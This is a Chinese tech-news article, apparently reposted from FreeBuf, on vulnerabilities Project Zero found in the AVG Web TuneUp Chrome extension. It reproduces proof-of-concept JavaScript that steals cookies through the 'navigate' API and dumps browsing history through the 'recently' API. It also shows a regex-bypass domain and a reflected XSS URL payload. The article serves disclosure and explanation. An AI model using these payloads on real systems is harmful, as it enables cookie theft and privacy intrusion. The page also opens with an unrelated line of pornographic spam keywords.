自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

谷歌瀏覽器插件曝多個(gè)高危漏洞,影響900萬(wàn)用戶

安全
今年8月15日, 來(lái)自project zero的成員Tavis提交了谷歌瀏覽器插件 AVG Web TuneUp的多個(gè)漏洞,由于該插件活躍用戶約900萬(wàn),所以影響范圍非常廣。

這個(gè)插件添加了很多的api用來(lái)操作谷歌瀏覽器,比如可以輕易的劫持搜索框和新標(biāo)簽頁(yè)。而由于其安裝過(guò)程十分復(fù)雜,所以能夠逃避谷歌惡意軟件的檢查,特別是能夠逃避谷歌瀏覽器“阻止濫用擴(kuò)展的API”的檢查。

事實(shí)上其中的很多api是有問(wèn)題的,攻擊者可以通過(guò)構(gòu)造payload成功盜取用戶在avg.com上的cookie,還可以獲取用戶的瀏覽記錄以及其他的私人數(shù)據(jù),甚至有可能成功實(shí)施任意命令執(zhí)行。

攻擊手法

Tavis在給廠商的郵件中列舉了幾種攻擊手法:"navigate" API 將會(huì)導(dǎo)致一個(gè)通用的跨域xss漏洞,attacker.com可以跨域讀取訪問(wèn)者的mail.google.com的郵件或者是來(lái)自于其他網(wǎng)站的數(shù)據(jù)。

  1. <script> 
  2.     for (i = 0; i < 256; i++) { 
  3.         window.postMessage({ origin: "web", action: "navigate", data: { 
  4.            url: "javascript:document.location.hostname.endsWith('.avg.com')" 
  5.                 + "?" 
  6.                     + "alert(document.domain + ':' +document.cookie)" 
  7.                 + ":" 
  8.                     + "false"
  9.            tabID: i 
  10.         }}, "*"); 
  11.     } 
  12. </script> 

 

以上代碼為Tavis給的poc

通過(guò) window.postMessage(允許跨域通信的javascript api) 不間斷的向 AVG: "Web TuneUP”插件發(fā)起請(qǐng)求,請(qǐng)求的數(shù)據(jù)為:

  1. { origin: "web", action: "navigate", data: {url:"javascript:document.location.hostname.endsWith('.avg.com')""?""alert(document.domain + ':' +document.cookie)"":""false",tabID: i}} 

當(dāng)用戶的標(biāo)簽頁(yè)在訪問(wèn)avg.com網(wǎng)站時(shí),將爆破以.avg.com結(jié)尾的網(wǎng)站的當(dāng)前域名和cookie值。"recently" api將會(huì)泄露當(dāng)前用戶的瀏覽記錄

  1. <script> 
  2. window.addEventListener("message", receiveMessage, false); 
  3. window.postMessage({ from: "web", to: "content", method: "recently" }, "*"
  4.   
  5. function receiveMessage(event) 
  6.     if (event.data != undefined && event.data.historyItems != undefined) { 
  7.         var obj = JSON.parse(event.data.historyItems); 
  8.   
  9.         document.write("Here is a list of websites you've been visiting"); 
  10.         document.write("<br>"); 
  11.         for (i in obj) { 
  12.             var d = new Date(obj[i]); 
  13.             document.write("<a href=" + i + ">" + i + "</a> on " + d); 
  14.             document.write("<br>"); 
  15.         } 
  16.     } 
  17. </script> 

 

以上代碼為Tavis給的poc

通過(guò)window.postMessage向插件的"recently"API發(fā)起請(qǐng)求獲取當(dāng)前用戶的瀏覽記錄,本地監(jiān)聽(tīng)事件來(lái)獲取返回的數(shù)據(jù),然后輸出數(shù)據(jù)。

隨后廠商對(duì)此進(jìn)行了修復(fù),但是由于修復(fù)的不對(duì),又被Tavis繞過(guò)了。修復(fù)的代碼中增加了判斷

  1. var match = event.origin.match(/https?:\/\/.*\.avg\.com/i); 
  2.   
  3. if (match ! null { 
  4. ... 

判斷來(lái)源是不是包含".avg.com",但是這個(gè)很容易被繞過(guò)。比如https://www.avg.com.www.attacker.com這個(gè)域名就能繞過(guò)這個(gè)限定,繼續(xù)實(shí)施上面提到的兩個(gè)攻擊。又會(huì)因?yàn)樯厦娴膶?duì)協(xié)議的判斷是既支持http又支持https,于是又產(chǎn)生了“中間人攻擊”這個(gè)問(wèn)題。

廠商對(duì)此又進(jìn)行了修復(fù),這次限制了域名必須為"mysearch.avg.com"和"webtuneup.avg.com" 。但通過(guò)下面這個(gè)xss,他又可以對(duì)用戶數(shù)據(jù)進(jìn)行竊?。?/p>

http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=%3Cimg%20src=x%20onerror=alert(1)%3E&searchParams=%7B%22lang%22%3A%22en%22%2C%22pid%22%3A%22pid%22%2C%22v%22%3A%22vv%22%7D

責(zé)任編輯:何妍 來(lái)源: FreeBuf
相關(guān)推薦

2023-04-04 22:20:53

2011-05-13 18:00:30

2022-12-08 09:47:29

2021-04-14 21:40:49

谷歌Chrome瀏覽器

2015-03-13 19:22:03

2015-03-14 10:30:58

谷歌漏洞信息泄露

2020-12-09 09:32:03

漏洞黑客瀏覽器

2022-01-17 12:46:05

API漏洞應(yīng)用程序安全

2015-05-07 14:57:33

瀏覽器

2009-10-19 23:25:04

2023-05-08 19:28:11

2022-02-17 16:03:10

Chrome安全漏洞瀏覽器

2010-01-21 11:31:53

火狐Chrome

2013-11-08 09:10:23

2022-09-05 11:25:22

惡意瀏覽器Chrome惡意擴(kuò)展

2022-05-05 14:01:02

DNS高危漏洞uClibc

2015-02-26 13:57:55

2020-06-19 14:55:14

信息泄漏惡意軟件攻擊

2020-11-04 14:55:06

谷歌GitHub漏洞

2019-07-21 08:33:53

瀏覽器擴(kuò)展插件安全
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)